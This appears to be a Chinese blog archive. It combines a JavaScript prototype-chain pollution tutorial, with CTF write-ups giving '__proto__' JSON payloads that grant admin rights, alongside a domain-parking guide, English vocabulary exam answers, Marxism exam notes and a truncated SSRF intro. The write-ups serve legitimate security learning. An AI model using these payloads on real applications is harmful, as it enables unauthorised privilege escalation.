// 第三种方式：Object.create
var p = {name: 'p'}
var o4 = Object.create(p)

console.log(o1)　　　　
console.log(o2)
console.log(o3)
console.log(o4)

来张图

有点晕_(¦3」∠)_，举个例子

1 2	var M = function (name) { this.name = name; } var o3 = new M('o3')

实例就是对象，在本例中o3就是实例，M就是构造函数。
实例通过new一个构造函数生成的。
从上图中可以知道，实例的__protpo__指向的是原型对象。
实例的构造函数的prototype也是指向的原型对象。
原型对象的construor指向的是构造函数。

原型链的应用

通过一个构造函数创建出来的多个实例，如果都要添加一个方法，给每个实例去添加并不是一个明智的选择。这时就该用上原型了。

在实例的原型上添加一个方法，这个原型的所有实例便都有了这个方法。

var M = function (name) { this.name = name; }
var o3 = new M('o3')
var o5 = new M('o5')

o3.__proto__.say = function() {
  console.log('hello ' + this.name);
};

o3.say() 
o5.say()

原型链污染

举个简单的污染的例子

var a = {number : 1}
var b = {number : 2}
a
b
b.__proto__.number=3 
b
var c= {}
c.number

当访问一个对象的属性或方法时，JavaScript 首先会在该对象本身查找，如果找不到，就会沿着原型链向上查找，直到找到该属性或方法，或者到达原型链的末尾

调用b.number时，它的具体调用过程是如下所示的

1、在b对象中寻找number属性

2、当在b对象中没有找到时，它会在b.__proto__中寻找number属性

3、如果仍未找到，此时会去b.__proto__.__proto__中寻找number属性

一层一层向上递归寻找，直到找到或是递归到null为止，因为b本身就有number属性，直接就是2

c.number也就来到了 c.__proto__中寻找number属性，我们刚刚进行了原型链污染，它的c.__proto__其实就是Object.protoype，而我们进行污染的b.__proto__也是Object.prototype，所以此时它调用的number就是我们刚刚污染的属性，所以这也就是为什么c .number=3

实战

cat-wife

题目环境：攻防世界

打开题目，是一个登录页面，后端采用的是Node.js

点击注册，勾上is admin，需要邀请码。（想要拿到flag，必须为admin）

注册界面的源码如下

app.post('/register', (req, res) => {
    let user = JSON.parse(req.body)
    if (!user.username || !user.password) {
        return res.json({ msg: 'empty username or password', err: true })
    }
    if (users.filter(u => u.username == user.username).length) {
        return res.json({ msg: 'username already exists', err: true })
    }
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }
    let newUser = Object.assign({}, baseUser, user)   //这里
    users.push(newUser)
    res.json({ msg: 'user created successfully', err: false })
})

注意这部分

1
2
3

let user = JSON.parse(req.body)  
// ...
let newUser = Object.assign({}, baseUser, user)  // 将用户输入合并到新对象

newUser


随便输个邀请码提交，抓包

![image-20250719223119296](/2025/07/14/2025-7-14-js%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/image-20250719223119296.png)

```js
payload：
{"username":"e","password":"e","__proto__":{"isAdmin":true}}

改一下包

然后登陆就拿到了flag

[LitCTF 2025]多重宇宙日记

环境：[LitCTF 2025]多重宇宙日记 | NSSCTF

首先注册然后登陆

查看源码

<script>
    // 更新表单的JS提交
    document.getElementById('profileUpdateForm').addEventListener('submit', async function(event) {
        event.preventDefault();
        const statusEl = document.getElementById('updateStatus');
        const currentSettingsEl = document.getElementById('currentSettings');
        statusEl.textContent = '正在更新...';

        const formData = new FormData(event.target);
        const settingsPayload = {};
        // 构建 settings 对象，只包含有值的字段
        if (formData.get('theme')) settingsPayload.theme = formData.get('theme');
        if (formData.get('language')) settingsPayload.language = formData.get('language');
        // ...可以添加其他字段

        try {
            const response = await fetch('/api/profile/update', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({ settings: settingsPayload }) // 包装在 "settings"键下
            });
            const result = await response.json();
            if (response.ok) {
                statusEl.textContent = '成功: ' + result.message;
                currentSettingsEl.textContent = JSON.stringify(result.settings, null, 2);
                // 刷新页面以更新导航栏（如果isAdmin状态改变）
                setTimeout(() => window.location.reload(), 1000);
            } else {
                statusEl.textContent = '错误: ' + result.message;
            }
        } catch (error) {
            statusEl.textContent = '请求失败: ' + error.toString();
        }
    });

    // 发送原始JSON的函数
    async function sendRawJson() {
        const rawJson = document.getElementById('rawJsonSettings').value;
        const statusEl = document.getElementById('rawJsonStatus');
        const currentSettingsEl = document.getElementById('currentSettings');
        statusEl.textContent = '正在发送...';
        try {
            const parsedJson = JSON.parse(rawJson); // 确保是合法的JSON
            const response = await fetch('/api/profile/update', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(parsedJson) // 直接发送用户输入的JSON
            });
            const result = await response.json();
            if (response.ok) {
                statusEl.textContent = '成功: ' + result.message;
                currentSettingsEl.textContent = JSON.stringify(result.settings, null, 2);
                 // 刷新页面以更新导航栏（如果isAdmin状态改变）
                setTimeout(() => window.location.reload(), 1000);
            } else {
                statusEl.textContent = '错误: ' + result.message;
            }
        } catch (error) {
             statusEl.textContent = '请求失败或JSON无效: ' + error.toString();
        }
    }
script>

可以发现参数isAdmin，应用会根据这个参数判断用户是否为admin

更新设置

可以通过 __proto__ 属性访问其原型（prototype），如果向对象中添加 __proto__ 字段，会修改该对象的原型链，影响所有继承自该原型的对象

1	{"settings":{"theme":"1","language":"1"}}

污染 settings 对象的原型

1	{"settings":{"theme":"a","language":"a","__proto__":{"isAdmin":true}}}

刷新下界面，加载出了管理面板，拿到flag

[MoeCTF 2021]fake game

环境：[MoeCTF 2021]fake game | NSSCTF

题目描述XDSEC/moeCTF_2021: moeCTF 2021 Challenges and writeup

题目如下

创建角色

看一下源码


DOCTYPE html>


    
    index
    
    


你有十点属性值可以用来分配，合理分配属性去挑战魔王吧！！！


    
        生命值：
        
    
    
        攻击力：
        
    
    
        护甲：

注意看注释：如果你将某一项属性值设为0，你将没有这项属性

猜测是原型链污染，构造payload：

1	{"attributes":{"health":0,"attack":0,"armor":0,"__proto__":{"health":999,"attack":999,"armor":999}}}

成功拿到flag

vistapanel中用网站停放功能实现cname

2025-07-07T15:30:00.000Z

前言

有些托管网站使用的是vistapanel来给用户管理网站，如果使用自己的域名，它需要用户将域名的ns记录指向特定的DNS 服务器才能实现托管。但这样我们就不能更改该域名的解析了，最重要的是基于该域名的子域名也就失效了。想要网站使用自己的域名，能被托管，并且域名的解析不会失效，可以用vistapanel中的网站停放达到cname的效果

实现方法

点击域名中的绑定域名

将自己域名的ns记录设置为它提供的那4个，等待一段时间（快的10分钟，慢的要等一天），点击创建域名（假设域名为kei.top）

ns1.byet.org
ns2.byet.org
ns3.byet.org
ns4.byet.org
ns5.byet.org

点击域名中的绑定子域名

创建一个子域名(假设为hei.22web.org)

点击域名中的别名(停放域名)

Domain Name填写自己的域名(kei.top)，Park onto选择刚才创建的子域名(hei.22web.org)

最后将自己的域名(kei.top)的ns换回去，加个cname解析指向子域名（hei.22web.org），这样就可以通过子域名（hei.22web.org）来管理的自己的域名（kei.top）

选填

2025-06-28T13:04:00.000Z

选填

一、Words in use题目、选填词汇及翻译

1.

题目：The guest speaker decided to __________ his speech in order to leave enough time for his audience to ask questions.
选填词汇：condense（压缩；精简）
翻译：这位特邀演讲者决定精简他的演讲，以便给听众留出足够的时间提问。

2.

题目：According to the media, China’s wind power capacity has __________ the previous level considerably.
选填词汇：exceeded（超过）
翻译：据媒体报道，中国的风电装机容量已大幅超过此前的水平。

3.

题目：Researchers conducted a set of psychological tests to determine the negative consequences of a sleep __________.
选填词汇：deficit（不足；缺乏）
翻译：研究人员进行了一系列心理测试，以确定睡眠不足的负面影响。

4.

题目：In addition to a sense of sight, bees also have an unusual sense of smell, so they can __________ more than 10 similar flower odors.
选填词汇：distinguish（区分；辨别）
翻译：除了视觉，蜜蜂还拥有不寻常的嗅觉，因此它们能区分10多种相似的花香。

5.

题目：Moving forward even in the face of great difficulties has become the most important __________ in my life and career.
选填词汇：asset（资产；优势）
翻译：即使面对巨大困难仍继续前进，这已成为我人生和职业生涯中最重要的优势。

6.

题目：The lawyer proclaimed that they couldn’t jump to conclusions because acceptable conclusions must be __________ supported by evidence.
选填词汇：adequately（充分地；足够地）
翻译：律师宣称他们不能妄下结论，因为可接受的结论必须有充分的证据支持。

7.

题目：To help the employees become more communicative, the company offered several workshops to those who were not __________ in social interactions.
选填词汇：competent（有能力的；胜任的）
翻译：为了帮助员工变得更善于沟通，公司为那些在社交互动中能力不足的人提供了多个工作坊。

8.

题目：Some parents try to help solve the problems that their sons and daughters have in __________ to their college life.
选填词汇：adjusting（适应）
翻译：一些父母试图帮助解决子女在适应大学生活中遇到的问题。

9.

题目：China’s series of __________ measures have proved to be effective for a steady economic recovery despite difficulties.
选填词汇：precise（精准的；精确的）
翻译：尽管面临困难，中国的一系列精准措施已被证明对经济稳定复苏有效。

10.

题目：The Italian businessman spoke fluent Chinese and demonstrated his Chinese __________ at the World Expo held in Shanghai.
选填词汇：proficiency（熟练程度；精通）
翻译：这位意大利商人说一口流利的中文，并在上海举办的世博会上展示了他的中文水平。

11.

题目：With the __________ global fight against poverty still continuing, many countries are looking to draw inspiration from China.
选填词汇：prolonged（长期的；持久的）
翻译：随着长期的全球脱贫斗争仍在继续，许多国家希望从中国汲取灵感。

12.

题目：According to the news __________, her interest in writing about plants and animals came from her childhood.
选填词汇：release（发布；公布）
翻译：根据新闻报道，她对撰写动植物的兴趣源于童年时期。

13.

题目：Many of them are beginners who have never done painting before and are looking to develop their __________ interests.
选填词汇：artistic（艺术的）
翻译：他们中的许多人是从未画过画的初学者，希望培养自己的艺术兴趣。

14.

题目：Consumers are increasingly comfortable shopping using their mobile devices, with 69 percent of people __________ and shopping online last year.
选填词汇：browsing（浏览）
翻译：消费者越来越习惯使用移动设备购物，去年有69%的人在线浏览和购物。

15.

题目：The tourists were awestruck at the __________ of the Great Wall, the building of which started as early as the seventh century B.C.E.
选填词汇：magnificence（壮丽；宏伟）
翻译：游客们对长城的宏伟惊叹不已，其建造最早可追溯到公元前7世纪。

16.

题目：As we know, earlier diagnosis (诊断) can give better treatment __________ to patients, which will also help them get effective care.
选填词汇：options（选择；选项）
翻译：正如我们所知，早期诊断可以为患者提供更好的治疗选择，这也将帮助他们获得有效的护理。

17.

题目：Some clinics require people to call the front desk to __________ their appointments before they come to see the doctors.
选填词汇：confirm（确认）
翻译：一些诊所要求患者在就诊前致电前台确认预约。

18.

题目：The website is reliable because I’ve made dozens of purchases from this very __________ site with zero problems.
选填词汇：reputable（声誉好的；可信的）
翻译：这个网站很可靠，因为我在这个信誉良好的网站上购物多次，从未出现过问题。

19.

题目：“What do you think the author meant when …?” is a common book club question, which __________ serious analysis of a topic.
选填词汇：provokes（引发；激起）
翻译：“你认为作者在……时想表达什么？”是读书俱乐部的常见问题，它引发对某一主题的深入分析。

20.

题目：Just as we all admire heroes, we look to others for inspiration and __________, but change has to start with you, as an individual.
选填词汇：aspiration（抱负；志向）
翻译：正如我们都崇拜英雄一样，我们从他人那里寻求灵感和抱负，但改变必须从作为个体的你开始。

21.

题目：The boss said, “The schedule is completely _______ because I do not need to be around and watch when you do your work.”
选填词汇：flexible（灵活的）
翻译：老板说：“日程安排完全灵活，因为你们工作时我不需要在旁边看着。”

22.

题目：Currently, the stock market is not very stable, but over the long run, the growth of stock funds will _______ the growth of the economy.
选填词汇：parallel（与……平行；与……一致）
翻译：目前股市不太稳定，但从长远来看，股票基金的增长将与经济增长同步。

23.

题目：These student volunteers can decide how to perform any _______ work, for which they are qualified and have a strong passion.
选填词汇：assigned（分配的；指定的）
翻译：这些学生志愿者可以决定如何完成任何分配的工作，他们对此具备资质且充满热情。

24.

题目：Human beings, by providing environmental enrichment, encourage animals to explore, interact, and _______ natural behaviors.
选填词汇：exhibit（表现；展示）
翻译：人类通过提供丰富的环境，鼓励动物探索、互动并表现出自然行为。

25.

题目：Along with extraordinary courage, qualities like __________, teamwork, and most importantly, leadership shine in all of our student activities.
选填词汇：persistence（坚持；毅力）
翻译：除了非凡的勇气，像毅力、团队合作，以及最重要的领导力等品质，在我们所有的学生活动中都熠熠生辉。

26.

题目：This is a beautiful part of the city to live in, with stylish and architecturally______historic buildings lining the clean and quiet streets.
选填词汇：stunning（令人惊叹的；极美的）
翻译：这是城市中适合居住的美丽区域，干净安静的街道两旁是时尚且具有建筑历史意义的令人惊叹的建筑。

27.

题目：An energetic search will soon be put in place to ______ a qualified person who can continue with the leadership of a big company.
选填词汇：recruit（招聘；招募）
翻译：很快将展开积极的搜寻，以招聘一位能够继续领导大公司的合格人才。

28.

题目：I’ve _______ hardships throughout my life, so I think I can handle the stress and achieve my full potential in this company.
选填词汇：endured（忍受；承受）
翻译：我一生都在忍受艰辛，因此我认为自己能应对压力，并在这家公司发挥全部潜力。

29.

题目：Many people believe that ________ exercise and outdoor sports could better help people stay healthy and strong.
选填词汇：vigorous（剧烈的；有力的）
翻译：许多人认为，剧烈运动和户外运动能更好地帮助人们保持健康和强壮。

30.

题目：With the help of my family and friends, all of my ________ doubts about myself gradually disappeared and my confidence was restored.
选填词汇：internal（内心的；内在的）
翻译：在家人和朋友的帮助下，我所有内心的自我怀疑逐渐消失，信心也得以恢复。

31.

题目：According to medical doctors, if a patient’s tumor is small, surgery is __________ performed to remove it.
选填词汇：typically（通常；一般）
翻译：根据医生的说法，如果患者的肿瘤较小，通常会进行手术切除。

32.

题目：These graduates brought deep-water ocean __________ technology to the region to help explore the areas.
选填词汇：survey（调查；勘测）
翻译：这些毕业生将深水海洋勘测技术带到该地区，以帮助探索这些区域。

33.

题目：Here is my suggestion in terms of writing process: Before you start writing an essay, just jot down __________ ideas to do brainstorming.
选填词汇：random（随机的；随意的）
翻译：关于写作过程，我的建议是：在开始写文章之前，先随意记下一些想法来进行头脑风暴。

34.

题目：It is important for athletes to have rigorous physical and technical training to __________ their performance in sports competitions.
选填词汇：maximize（最大化；充分发挥）
翻译：运动员进行严格的身体和技术训练以最大化他们在体育比赛中的表现，这一点很重要。

35.

题目：After successful completion of these courses, students ____________ the academic requirements for their undergraduate studies.
选填词汇：will have fulfilled（完成；满足）
翻译：成功完成这些课程后，学生将满足本科学习的学术要求。

36.

题目：Only three short straightforward words, but they were said so __________ that all the audience were impressed.
选填词汇：resolutely（坚决地；果断地）
翻译：只有三个简短直白的词，但他说这话时如此果断，让所有听众都印象深刻。

37.

题目：This position would ideally suit candidates who have exposure to working on key __________ projects, preferably in the area of geophysics.
选填词汇：strategic（战略的；关键的）
翻译：这个职位最适合有参与关键战略项目经验的候选人，最好是在地球物理领域。

38.

题目：Internship, which gives you valuable work experience, can offer you a(n) __________ opportunity to be competitive in the job market.
选填词汇：exceptional（非凡的；特殊的）
翻译：实习能为你提供宝贵的工作经验，为你在就业市场中提供一个具有竞争力的特殊机会。

39.

题目：He understood that his __________ the dream was not for himself but for the people who had the same hopes and passions as him.
选填词汇：chasing（追逐；追求）
翻译：他明白，他追逐梦想不是为了自己，而是为了那些与他有着相同希望和热情的人。

40.

题目：He gave us very __________ instructions on how to handle the new machine, so we all understood what he meant.
选填词汇：explicit（明确的；清楚的）
翻译：他就如何操作这台新机器给了我们非常明确的指示，所以我们都明白了他的意思。

二、Expressions in use题目、选填词汇及翻译

1.

题目：In Chinese culture, adult children are expected to take care of their aged parents, so they _______________ contact or visit their parents regularly.
选填词汇：are obliged to（有义务；不得不）
翻译：在中国文化中，成年子女被期望照顾年迈的父母，因此他们有义务定期联系或探望父母。

2.

题目：Most of the time, people don’t really care about natural disasters and won’t _______________ avoiding them till they are personally affected by one.
选填词汇：get serious about（认真对待）
翻译：大多数时候，人们并不真正关心自然灾害，直到自己亲身经历才会认真对待防灾。

3.

题目：When you ________ a friend that you haven’t seen for a long time and have a good chat with him or her, you will surely be delighted.
选填词汇：run into（偶遇；撞见）
翻译：当你偶遇一位久未见面的朋友并与他/她好好聊天时，你一定会感到开心。

4.

题目：While reading, we need to _________________ facts and opinions in order to have a better and more accurate comprehension.
选填词汇：distinguish between（区分；辨别）
翻译：阅读时，我们需要区分事实和观点，以获得更好、更准确的理解。

5.

题目：The growth of the food e-commerce sector in China has played an important role in promoting the sales of agricultural products _________ the fields.
选填词汇：fresh from（刚从……来的；新鲜的）
翻译：中国食品电商行业的发展在促进刚从田间采摘的农产品销售方面发挥了重要作用。

6.

题目：If I don’t like someone or something, I might just say I ___________ them, even though it sounds a little rude.
选填词汇：am allergic to（对……过敏；反感）
翻译：如果我不喜欢某人或某物，我可能会说我对他们“过敏”，尽管这听起来有点粗鲁。

7.

题目：When the topic was discussed, I quickly _________ because I am not good at things like math and analytical skills.
选填词汇：got lost（迷失；困惑）
翻译：讨论这个话题时，我很快就困惑了，因为我不擅长数学和分析技能之类的事情。

8.

题目：It is hoped that some companies will _________________ this small old town to invest and build factories.
选填词汇：become attracted to（对……产生兴趣；被吸引）
翻译：希望一些公司会被这个古老的小镇吸引，来投资建厂。

9.

题目：The Tang Dynasty is _______________ a golden age in Chinese history, when Chinese culture spread across much of Asia.
选填词汇：looked upon as（被视为；被看作）
翻译：唐朝被视为中国历史上的黄金时代，当时中国文化传播到亚洲大部分地区。

10.

题目：When I first saw the scenery of Mount Huangshan, I was _______: the fascinating pine trees, the spectacular peaks, and the fairyland of clouds and mists.
选填词汇：in awe（敬畏；惊叹）
翻译：当我第一次看到黄山的景色时，我惊叹不已：迷人的松树、壮观的山峰和云雾缭绕的仙境。

11.

题目：The group discussion became heated, with creative ideas and suggestions ____________from time to time.
选填词汇：thrown out（提出；抛出）
翻译：小组讨论变得热烈起来，不时有创意的想法和建议被提出。

12.

题目：Whenever there is a chance we can help these children, we make a top effort and don’t want to _______________.
选填词汇：let them down（让……失望）
翻译：每当有机会帮助这些孩子时，我们都会全力以赴，不想让他们失望。

13.

题目：Science is not my profession, so if you want to discuss it, you could _______________ other people here who know science better than me.
选填词汇：pick the brains of（向……请教；征求意见）
翻译：科学不是我的专业，所以如果你想讨论它，可以向这里比我更懂科学的人请教。

14.

题目：I draw inspiration from many teachers who are _______________ their work and try to spread their enthusiasm to their students.
选填词汇：passionate about（对……充满热情）
翻译：我从许多对工作充满热情并试图将热情传递给学生的老师那里汲取灵感。

15.

题目：The tourists were awestruck at the __________ of the Great Wall, the building of which started as early as the seventh century B.C.E. 选填词汇：magnificence（壮丽；宏伟）翻译：游客们对长城的宏伟惊叹不已，其建造最早可追溯到公元前7世纪。

16.

题目：If you feel that your grades or your study skills are_____________, you may turn to your teachers for advice.
选填词汇：not up to par（未达标准；不够好）
翻译：如果你觉得自己的成绩或学习能力不够好，可以向老师寻求建议。

17.

题目：I had never been to this restaurant before, but it __________ fantastic not only because of its delicious food but also the wonderful service.
选填词汇：turned out（结果是；证明为）
翻译：我以前从未去过这家餐厅，但结果它很棒，不仅因为食物美味，还因为服务出色。

18.

题目：If one is always _______________ money, appearance, and social status, they will unfortunately forget what is most important in their life.
选填词汇：obsessed with（痴迷于；沉迷于）
翻译：如果一个人总是沉迷于金钱、外表和社会地位，不幸的是，他们会忘记生活中最重要的东西。

19.

题目：The course project that I completed weeks ago has helped me _______ my creativity and intuition which I didn’t even realize I had.
选填词汇：tap into（挖掘；利用）
翻译：几周前完成的课程项目帮助我挖掘了自己甚至未曾意识到的创造力和直觉。

20.

题目：Many people probably _______________ fast Internet access is almost everywhere – at home, at work, and even in the most remote areas.
选填词汇：take it for granted that（想当然地认为）
翻译：许多人可能想当然地认为快速互联网接入几乎无处不在——在家、工作场所，甚至在最偏远的地区。

21.

题目：It’s probably true that we always ________ the goal that we consider challenging but achievable to gain a sense of accomplishment.
选填词汇：strive for（努力追求；力争）
翻译：或许我们总是在努力追求那些我们认为具有挑战性但可实现的目标，以获得成就感。

22.

题目：It’s ______________ to say that the kitchen he installed last month is 100 times better, and now I fortunately have the kitchen I dreamed of.
选填词汇：no exaggeration（毫不夸张；绝非夸大）
翻译：毫不夸张地说，他上个月安装的厨房要好100倍，现在我幸运地拥有了梦想中的厨房。

23.

题目：Since the exam __________ what you have learned, you can expect to see some questions from previous assignments.
选填词汇：is based on（基于；以……为基础）
翻译：由于考试以你所学的内容为基础，你可以预期会看到一些来自以前作业的问题。

24.

题目：I think journalists work in a timely manner and _______________ daily deadlines or tight working schedules because they were well trained in this way.
选填词汇：are accustomed to（习惯于）
翻译：我认为记者工作及时，且习惯于每日的截止日期或紧凑的工作安排，因为他们受过良好的训练。

25.

题目：The situation between us is very challenging, but we have to learn how to handle the difficult situation _____________ improving our relations.
选填词汇：for the sake of（为了……的利益；为了）
翻译：我们之间的情况非常具有挑战性，但为了改善关系，我们必须学会如何处理这一困难局面。

26.

题目：The award-winning chef says that since he was young, he __________________ Chinese food because of its rich ingredients and well-balanced nutrition.
选填词汇：has had a passion for（对……有热情）
翻译：这位获奖厨师说，自从年轻时起，他就对中国菜充满热情，因为其食材丰富且营养均衡。

27.

题目：When I was traveling in China, I would ride my bike slowly, take pictures of the things that _______________, and talk to people.
选填词汇：caught my eye（吸引我的注意力；引起我的注意）
翻译：在中国旅行时，我会慢慢骑自行车，拍摄吸引我注意的事物，并与人们交谈。

28.

题目：As a senior assistant in the lab for quite a few years, I was thrilled to _______________ teach lab techniques to the new students.
选填词汇：be entrusted to（被委托；被赋予）
翻译：作为实验室的资深助理多年，我很兴奋能被委托向新生教授实验技术。

29.

题目：It was raining heavily, so she spent the whole afternoon __________ in her dorm room and reading.
选填词汇：holing up（待在……里；躲藏）
翻译：雨下得很大，所以她整个下午都待在宿舍里看书。

30.

题目：We will build a closer partnership and ______________________ high-quality cooperation under the Belt and Road Initiative.
选填词汇：remain committed to（坚持；致力于）
翻译：我们将建立更紧密的伙伴关系，并致力于“一带一路”倡议下的高质量合作。

31.

题目：I went back to school to get my coaching certification, and my efforts and persistence ___________ in the end.
选填词汇：paid off（取得成功；得到回报）
翻译：我回到学校获取教练证书，我的努力和坚持最终得到了回报。

32.

题目：She joined the lab as a summer student and then __________ to complete her fourth-year honors thesis before graduation.
选填词汇：stayed on（留下；继续留下）
翻译：她以暑期学生的身份加入实验室，然后留下在毕业前完成四年级的荣誉论文。

33.

题目：The traditions that _______________ from generation to generation will surely enrich our culture and be carried forward.
选填词汇：are passed down（传承；传递）
翻译：世代传承的传统必将丰富我们的文化并得以弘扬。

34.

题目：To fight against the common health crisis, China has made great efforts to help other countries _______________ medicines.
选填词汇：in urgent need of（急需；迫切需要）
翻译：为应对共同的健康危机，中国已作出巨大努力，帮助急需药品的其他国家。

马克思期末

2025-06-28T02:38:00.000Z

马克思主义的当代价值
观察当代世界变化的认识工具
指引当代在中国行动的指南针
引领人类社会进步的科学真理
意识对物质的反作用（意识的能动作用的表现）
意识具有目的性和计划性。
意识具有创造性。
意识具有指导实践改造客观世界的作用。
意识具有调控人的行为和生理活动的作用
具体分析
对立统一规律提供了人们认识世界和改造世界的根本方法–矛盾分析方法。

矛盾的普遍性和特殊性及其相互关系
“两点论” 是指在分析事物的矛盾时，不仅要看到矛盾双方的对立，而且要看到矛盾双方的统一；不仅要看到矛盾体系中存在主要矛盾、矛盾的主要方面，而且要看到次要矛盾、矛盾的次要方面。“重点论”是指要着重把握主要了盾、矛盾的主要方面，并以此作为解决问题的出发点。
矛盾的普遍性和特殊性是辩证统一的关系。矛盾的普遍性即盾的共性，矛盾的特殊性即矛盾的个性。矛盾的共性是无条件的、绝对的，矛盾的个性是有条件的、相对的。任何现实存在的事物的盾都是共性和个性的有机统一，共性寓于个性之中，没有离开个性的共性，也没有离开共性的个性。
矛盾的普遍性和特殊性辩证关系原理是马克思主义基本原理同各实际相结合的哲学基础。
量变质变规律
第一，量变是质变的必要准备。
第二，质变是量变的必然结果。
第三，量变和质变是相互渗透的。
否定之否定规律
第一，否定是事物的自我否定、自我发展，是事物内部矛盾运动的结果。
第二，否定是事物发展的环节是旧事物向新事物的转变，是从旧质到新质的飞跃。只有经过否定，旧事物才能向新事物转变。
第三，否定是新旧事物联系的环节，新事物孕育产生于旧事物、新旧事物是通过否定环节联系起来的。
第四，辩证否定的实质是“扬弃” 即新事物对旧事物既批判又继承，既克服其消极因素又保留其积极因素
具体分析
矛盾分析方法是对立统一规律在方法论上的体现，在唯物辩证法的方法论体系中居于核心地位，是我们认识事物的根本方法。

科学实践观的意义
第一，克服了旧唯物主义的根本缺陷，为辩证唯物主义的创立奠定了科学的理论基础。
第二，揭示了实践对认识的决定作用，为能动的、革命的反映论的创立奠定了科学的理论基础。
第三，在人类思想史上第一次揭示了社会生活的实践本质，为唯物中见的创立奠定了科学的理论基础。
第四，为人们能动地认识世界和改造世界提供了基本的思想方法和工作方法。
实践的本质
实践具有客观实在性
实践具有自觉能动性
实践具有社会历史性。
实践对认识的决定作用
实践是认识的来源。
实践是认识发展的动力实践是认识的日的。
实践是检验认识真理性的唯一标准。
从实践到认识（理性认识和感性认识）
第一，理性认识依赖于感性认识。
第二，感性认识有待于发展和深化为理性认识。
第三，感性认识和理性认识相互渗透、相互包含。
真理的绝对性和相对性
真理的绝对性和相对性的辩证统从直理的两重性上看真理的绝对性与相对性相互依存，任何真理都既是绝对的，又是相对的真理的绝对性与相对性又是相互包含的。
价值的基本特征
个人的行为受控于价值观
价值具有主体性、客观性、多维性和社会历史性四个基本特性，它们是价值本质的表现。
真理与价值在实践中的辩证统一
一方面，价值尺度必须以真理为前提。另一方面，人类自身需要的内在尺度，推动着人们不断发现新的真理。
守正创新
要坚持守正不动摇。所谓守正，就是坚持实事求是，坚持真理性认识，坚持正确政治方向。
所谓创新，就是坚持解放思想，破除与客观事物进程不相符合的旧观念、旧模式、旧做法，发现和运用事物的新联系、新属性、新规律，更有效地认识世界和改造世界。
生产力与生产关系的矛盾运动及其规律
第一，生产力决定生产关系。
第二，生产关系对生产力具有能动的反作用。
社会基本矛盾与社会主要矛盾
社会基本矛盾和社会主要矛盾不是同一个概念，也不是同一层次的矛盾。社会主要矛盾是社会基本矛盾的具体体现。
科学技术
正确认识和运用科学技术，首要的就是有合理的社会制度保障科学技术的正确运用，始终坚持使科学技术为人类社会的健康发展服务，让
科学技术为人类造福。
文化在社会发展中的作用
第一，文化为社会发展提供思想指引。
第二，文化为社会发展提供精神动力。
第三，文化为社会发展提供凝聚力量
科学社会主义基本原则的主要内容（注意）
第一，资本主义必然灭亡，社会主义必然胜利。
第二，无产阶级是最先进最革命的阶级，肩负着推翻资本主义旧世。建立社会主义和共主义新世界的历史使命
第三，无产阶级革命是无产阶级进行斗争的最高形式，以建立无产阶级专政的国家政权为目的。
第四，要在生产资料公有制基础上组织生产，以满足全体社会成员的需要为生产的根本目的。
第五，要对社会生产进行有计划的指导和调节，实行按劳分配原则。
第六，要合乎自然规律地改造和利用自然，努力实现人与自然的和谐共生。
第七，必须坚持科学的理论指导，大力发展社会主义先进文化。
第八，无产阶级政党是无产阶级的先锋队，社会主义事业必须始终坚持无产阶级政党的领导。
第九，社会主义社会要大力解放和发展生产力，逐步消灭剥削和消除两极分化，实现共同富裕和社会全面进步，并最终向共产主义社会过渡。
第十，共产主义是人类最美好的社会制度，实现共产主义是共产党人的最高理想
科学社会主义基本原则与中国特色社会主义的关系
中国特色社会主义始终坚持科学社会主义基本原则。
中国特色社会主义既坚持了科学社会主义基本原则，又具有鲜明的民族特色和时代特色。
新时代中国特色社会主义在坚持科学社会主义基本原则基础上，在与中国具体实际和中华优秀传统文化结合中，作出了一系列重大创新。
社会主义发展道路多样性的原因
第一，各个国家的生产力发展状况和社会发展阶段决定了社会主义发展道路具有不同的特点。
第二，历史文化传统的差异性是造成不同国家社会主义发展道路多样性的重要条件。
第三，时代和实践的不断发展，是造成社会主义发展道路多样性的现实原因。
经济全球化的影响及表现（注意）
表现
第一，生产全球化。
第二，贸易全球化。
第三，金融全球化
动因
一是科学技术的进步和生产力的发展为经济全球化提供了坚实的物质基础和根本的推动力。
二是跨国公司的发展为经济全球化提供了适宜的企业组织形式。
三是各国经济体制的变革和国际经济组织的发展是经济全球化的体制与组织保障
影响
经济全球化为世界经济增长提供了强劲动力，促进了商品和资本流动、科技和文明进步、各国人民交往。
积极作用:第一，经济全球化为发展中国家提供先进技术和管理经验。
第二，经济全球化为发展中国家提供更多的就业机会。
第三，经济全球化推动发展中国家国际贸易的发展。
第四，经济全球化促进发展中国家跨国公司的发展。
负面影响：
发达国家与发展中国家在经济全球化进程中的地位和收益不平等、不平衡。
一定程度上增加了经济风险。
加剧了发展中国家资源短缺和环境污染。
人民群众是历史的创造者（注意）
人民群众是社会物质财富的创造者。
人民群众是历史的创造者
人民群众是社会精神财富的创造者。
人民群众是社会变革的决定力量。
社会基本矛盾在历史发展中的作用（注意）
首先，生产力是社会基本矛盾运动中最基本的动力因素，是人类社会发展和进步的最终决定力量。
其次，社会基本矛盾特别是生产力和生产关系的矛盾，决定着社会中其他矛盾的存在和发展
最后，社会基本矛盾具有不同的表现形式和解决方式，并从根本影响和促进社会形态的变化和发展。
实践对认识的决定作用？（注意）
①实践是认识的来源
②实践是认识发展的动力
③实践是认识的目的
④实践是检验认识真理的唯一标准
人工智能为什么不能代替人类？物质与意识的辩证关系（注意）
①人类意识是知情意的统一体，而人工智能只是对人类的理性智能的模拟和扩展，不具备情感、信念、意志等人类意识形式
②社会性是人的意识所固有的本质属性，而人工智能不可能直正具备人类的社会属性。
③人类的自然语言是思维的物质外壳和意识的现实形式，而人工智能难以完全具备理解自然语言真实意义的能力。
④人工智能能够获得人类意识中可以化约为数字信号的内容，但人脑中总有许多东西是无法被化约的。
事物的普遍联系（注意）
首先，联系具有客观性
其次，联系具有普遍性
再次，联系具有多样性。事物联系的主要方式有直接联系与间接联系、内部联系与外部联系、本质联系与非本质联系、必然联系与偶然联系等
最后，联系具有条件性。

SSRF

2025-06-18T12:26:00.000Z

原理

先来张图

SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）

协议

file

